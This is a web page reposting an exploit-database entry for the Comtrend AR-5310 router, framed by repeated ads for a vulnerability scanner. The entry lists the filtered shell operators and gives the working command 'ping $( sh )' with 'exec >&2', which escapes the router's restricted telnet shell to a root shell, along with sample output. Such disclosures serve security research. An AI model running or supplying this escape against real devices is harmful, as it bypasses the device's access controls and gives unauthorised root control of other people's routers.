comtrendar5310 restricted shell escape

▸▸▸ Exploit & Vulnerability >>   local exploit & linux vulnerability




comtrendar5310 restricted shell escape Code Code...
				
# Exploit Title: Comtrend-AR-5310 - Restricted Shell Escape # Date: 2019-07-20 # Exploit Author: AMRI Amine # Vendor Homepage: https://www.comtrend.com/ # Version: GE31-412SSG-C01_R10.A2pG039u.d24k # Tested on: Linux (busybox) TL;DR: A local user can bypass the restricted shell using the command substitution operator $( commmand ) Comtrend AR 5310 routers have a restricted shell, the list of command a user can execute is [ ? help logout exit quit reboot ads lxdslctl xtm loglevel logdest virtualserver ddns dumpcfg dumpmdm meminfo psp dumpsysinfo dnsproxy syslog ifconfig ping sntp sysinfo tftp wlan wlctl vlanctl arp defaultgateway dhcpserver dns lan lanhosts passwd ppp restoredefault route nslookup traceroute save uptime exitOnIdle wan build version serialnumber modelname acccntr upnp urlfilter timeres tr69cfg logouttime ipneigh dhcp6sinfo nat mcpctl ] Usual terminal constructs like: the command separator ";" the control operator "&" (run in forground) the redirection operator (pipe) "|" the command substitution operator "`" are all filtered as shown here : > ; Warning: operator ; is not supported! telnetd:error:476.449:processInput:490:unrecognized command > | Warning: operator | is not supported! telnetd:error:484.871:processInput:490:unrecognized command > & Warning: operator & is not supported! telnetd:error:487.421:processInput:490:unrecognized command > ` Warning: operator ` is not supported! telnetd:error:495.334:processInput:490:unrecognized command Still the $ operator is not filtered: > $ telnetd:error:497.862:processInput:490:unrecognized command $ Here i came to the conclusion that invoking a command with $( subcommand ) as argument would give an obvious shell > ping $( sh ) exec >&2 ps x | grep telnet 18333 root 4164 S telnetd -m 0 18334 root 4168 S telnetd -m 0 EOF

Comtrendar5310 restricted shell escape Vulnerability / Exploit Source : Comtrendar5310 restricted shell escape



Last Vulnerability or Exploits

Developers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Easy integrations and simple setup help you start scanning in just some minutes
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Discover posible vulnerabilities before GO LIVE with your project
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Manage your reports without any restriction

Business Owners

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Obtain a quick overview of your website's security information
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Do an audit to find and close the high risk issues before having a real damage and increase the costs
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Verify if your developers served you a vulnerable project or not before you are paying
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Run periodically scan for vulnerabilities and get info when new issues are present.

Penetration Testers

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Quickly checking and discover issues to your clients
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Bypass your network restrictions and scan from our IP for relevant results
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Create credible proved the real risk of vulnerabilities

Everybody

Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check If you have an website and want you check the security of site you can use our products
Website Vulnerability Scanner - Online Tools for Web Vulnerabilities Check Scan your website from any device with internet connection

Tusted by
clients

 
  Our Cyber Security Web Test application uses Cookies. By using our Cyber Security Web Test application, you are agree that we will use this information. I Accept.